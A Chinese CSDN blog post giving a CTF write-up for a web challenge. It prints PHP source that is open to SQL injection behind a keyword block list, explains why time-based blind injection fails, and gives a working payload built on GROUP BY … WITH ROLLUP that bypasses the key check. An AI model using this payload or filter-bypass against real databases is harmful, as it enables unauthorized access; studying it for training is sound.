安恒周周练西湖论剑版web美男子题:巧用group by with rollup

最新推荐文章于 2023-03-07 11:21:43 发布
最新推荐文章于 2023-03-07 11:21:43 发布
阅读量2.6k 收藏 1
点赞数 2
分类专栏: sqli ctfweb 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013457794/article/details/89094376
版权
ctfweb 同时被 2 个专栏收录
13 篇文章 0 订阅
订阅专栏
sqli
5 篇文章 0 订阅
订阅专栏

安恒周周练西湖论剑版web美男子题:巧用group by with rollup

2019年4月8日15:49:30

源码:

<?php
	include 'global.php';
	
	function AttackFilter($StrKey,$StrValue,$ArrReq){  
	    if(is_array($StrValue))
	    {
	        $StrValue=implode($StrValue);
	    }
	    if (preg_match("/".$ArrReq."/is",$StrtValue)==1){   
	        print "holy shit!";
	        exit();
	    }      
	} 
	
	$filter = "union|select|from|where|join|sleep|benchmark|,|\(|\)";
	
	foreach($_POST as $key=>$value){ 
	    AttackFilter($key,$value,$filter);
	}
	
	if(!isset($_POST['key1']) || !isset($_POST['key2'])) {
	    print <<<DBAPP
	
	<img src='image/img.jpg' />
	<!--index.phps-->
	DBAPP;
	    die;
	}
	
	$query = mysql_query("SELECT * FROM tb_ctf WHERE key1 = '{$_POST['key1']}'"); 
	if(mysql_num_rows($query) == 1) { 
	    $key = mysql_fetch_array($query);
	    if($key['key2'] == $_POST['key2']) {
	        print $flag;
	    }else{
	        print "Error!";
	        }
	}else{
	    print "Error!";
	}

通过源码可知道表名为tb_ctf,且表内有一个字段key2,用户通过传入key1和key2,如果提交的key2的值等于查询到的key2的值,那么就能看到flag

解题思路

  1. 通过提交key1,sql注入得到key2的值,再在key2中提交即可
  2. 逻辑绕过

Do it

  1. 一开始就打算用时间盲注。首先要知道时间盲注需要两个因素:

    1. 条件判断:
      比如条件语句成功时执行延时,失败则不执行,以此来判断payload是否生效
      常用if(),and or组合,^,elt(),FIELD(),select case when ~ then ~ else ~ end
    2. 延时:
      如果服务器有延时则说明payload生效了
      常用sleep(),benchmark(),heavy query,get_lock()

    因为过滤了select , sleep,所以很难同时满足条件判断和延时,所以想在这条路上走下去有点难,考虑逻辑绕过

  2. 此题的确存在逻辑绕过,仔细看源码

     $query = mysql_query("SELECT * FROM tb_ctf WHERE key1 = '{$_POST['key1']}'"); 
 if(mysql_num_rows($query) == 1) { 
     $key = mysql_fetch_array($query);
     if($key['key2'] == $_POST['key2']) {
         print $flag;
     }

    最后的条件判断中,查询的key2的值是我们通过提交key1查询到的key2的值,这不一定是数据库中的真实的key2的值,我们是否可以通过提交key1的值来影响接下来查询到的key2的值呢,答案是肯定的。

  3. group by with rollup

举例:

	mysql> select * from su where id =1 group by exam with rollup;
	+----+---------+------+------+
	| id | content | exam | su   |
	+----+---------+------+------+
	|  1 | test    | ccc  | 1    |
	|  1 | test    | NULL | 1    |
	+----+---------+------+------+
	2 rows in set (0.00 sec)

可以看出,以某个字段排序就会有一行查询结果中该字段为空,所以这里我们只需要让 key2 为空就行了。

	key1=' or 1=1 GROUP BY key2 WITH ROLLUP LIMIT 1 OFFSET 1--+&key2=
young9222
关注
专栏目录
安恒西湖论剑周练Reverse刮开有奖WP
iqiqiya的博客
04-06 2675
目信息: 这是一个赌博程序,快去赚钱吧!!!!!!!!!!!!!!!!!!!!!!!!!!!(在编辑框中的输入值,即为flag,提交即可) 无壳无花,IDA 可以直接看到具体过程 关键函数就是这个 (IDA静态分析出来的直接看的话有点问 需要结合动态调试具体情况) BOOL __stdcall DialogFunc(HWND hDlg, UINT a2, WPARAM a3,...
安恒周周练15(流量分析1~4)——20180902
原味瓜子、的博客
09-02 3113
目:https://pan.baidu.com/s/1139Qisn8H3TmOboj5puY9Q 提取码:bp6f 目描述 某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户,随后利用破解的密码登录了mail系统,然后获取了vpn的申请方式,然后登录vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下列问: 过程分析: 1、攻击web服务...
2019 安恒周周练西湖论剑特别 pwn 目wp
abc380620175的博客
03-28 568
pwn1 考点:构造 shellcode,patch 汇编指令 IDA 查看反汇编,程序的逻辑很简单如,如果 直接 f5 的话 IDA 可能识别不出来函数,问出在 0x080484CF 这个地方,call eax 指令识别不出来,所以这里可以先 patch 成 nop,之后 f5 就正常了。 程序把输入当成 shellcode 直接来执行,很显然是直接往栈上写 shellcode ...
group by columns with rollup
Blog_inG的博客
10-18 350
使用 WITH ROLLUP WITH ROLLUP 可以实现在分组统计数据基础上再进行相同的统计(SUM,AVG,COUNT…)。 例如我们将以上的数据表按名字进行分组,再统计每个人登录的次数: mysql&gt; SELECT name, SUM(singin) as singin_count FROM employee_tbl GROUP BY name WITH ROLLUP; ...
攻防世界新手练习_WEB(渗透)
菜鸟-传奇
08-26 380
攻防世界新手练习_WEB(渗透)
ctf-如来十三掌
最新发布
wrypot的博客
03-07 578
ctf:1、菜狗为了打败菜猫,学了一套如来十三掌。2、流量telnet。3、1和0的故事。 4、base64÷4。5、SSCTF线上选举美男大赛开始了,泰迪拿着他的密码去解密了
BUUCTF_luck_guy
weixin_46009088的博客
10-22 787
BUUCTF_luck_guy 照例用IDA打开,找到main函数,如下: 就patch_me函数看起来有点用. get_flag接着点进去. unsigned __int64 get_flag() { unsigned int v0; // eax char v1; // al signed int i; // [rsp+4h] [rbp-3Ch] signed int j; // [rsp+8h] [rbp-38h] __int64 s; // [rsp+10h] [rbp-.
CTF安恒周周练1-9+解析.zip
10-10
CTF安恒周周练1-9+解析.zip
安恒明鉴web漏洞扫描器
01-20
【安恒明鉴Web漏洞扫描器】是一款专业的网络安全工具,主要针对Web应用程序的安全性进行深度检测,以发现潜在的漏洞并帮助企业或个人提前预防网络攻击。这款扫描器使用了先进的扫描技术和策略,能够自动化地执行多种...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CTF西湖论剑
weixin_33845477的博客
03-31 212
一,西湖论剑 itoa()函数有3个参数:第一个参数是要转换的数字,第二个参数是要写入转换结果的目标字符串,第三个参数是转移数字时所用 的基数。在上例中,转换基数为10。10:十进制;2:二进制... memset是计算机中C/C++语言初始化函数。作用是将某一块内存中的内容全部设置为指定的值, 这个函数通常为新申请的内存做初始化工作。 flag就是 123_Buff3r_0v3rf|0...
安恒西湖论剑线下上午CTF部分目WP
05-30 646
简单的做了两个,一道逆向,一道misc,其他目,因为博主上课,时间不太够,复现时间也只有一天,后面的会慢慢补上 先说RE1,一道很简单的win32逆向,跟踪主函数,R或者TAB按几下, 根据esp返回地址,来确定,这里将字符串根据偏移地址依次入栈,在调用print函数后,又对字符进行了替换 因此flag很容易得到 Dbapp{crackme100} F5看一下伪代码 ...
CTF小练
a_little_bean的博客
10-22 1970
一、无处不在的广告(隐写)保存图片,用Stegsolve打开,不断调试,找到二维码,扫描得答案, 二、水果(隐写)保存图片,用Stegsolve打开,不断调试,找到二维码, 扫描得一串数, 45 46 45 46 32 45 32 46 46 45 46 32 46 45 46 46 32 46 46 46 32 45 46 46 46 32 46 46 45 45 46 45 32 4
sam哥其实是个安静的美男子...
weixin_34072637的博客
10-25 156
自我介绍:hello大家好,我是sam哥...好了,说了这么多,让我一起探索Linux神话如果练成的吧! 转载于:https://blog.51cto.com/sam99/1568015
babyGo(安恒2019.1 pop链的构造)
stepone4ward的博客
02-24 2221
周练的时候看了一叶飘零师傅的博客才知道pop链的存在(还是太菜了啊),先来学习一下关于pop链的知识。 再看一看这道目的baby类 也就是说这道目中的类baby调用了sec类的read()方法。l 但是sec类的read()是一个安全函数,这时候发现cool类也存在一个read()方法,我们可以利用cool类的read()函数对flag.php进行读取。 这个时候就要利用最开始提到的...
CTF训练笔记(五)- 一些获取FLAG的方法总结(待续)
morrino的博客
04-21 2万+
- 注意开放了未知服务的端口,可以使用nc工具获取对应的Banner信息; - 当命令疑似被过滤时,尝试使用相近的shell命令绕开过滤,如‘cat’换成‘more’; - 不放过任何可利用服务和细节,哪怕可能会做无用功; [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
安恒杯——西湖论剑5月web——未完成的网站1
recover517的博客
05-30 2414
安恒杯 web 未完成的网站1
CTF图片隐写
热门推荐
All Blue的博客
10-12 3万+
1.隐藏在图片属性里的信息或者以文本形式打开能直接获取的信息。 例如实验吧里的一道(这个背影我给满分),就是将信息隐藏在属性里 又或者文本形式能直接看到的(分别是黑客榜中榜游戏和南邮平台的两道) 总结:此类较简单,但还是要细心看一看,不然一眼扫过去没发现隐藏信息就惨了,转而去试各种高级姿势都不可能有结果的…虽然比赛一般不考这
因缺思汀的绕过
3569
02-22 1978
阅读源码知道 保证查找内容可控就可以进行绕过 类似 union select 1,2 然后密码填写 2 目源码 <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo ''.""; echo ''.""; echo ''.""; echo ''."
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值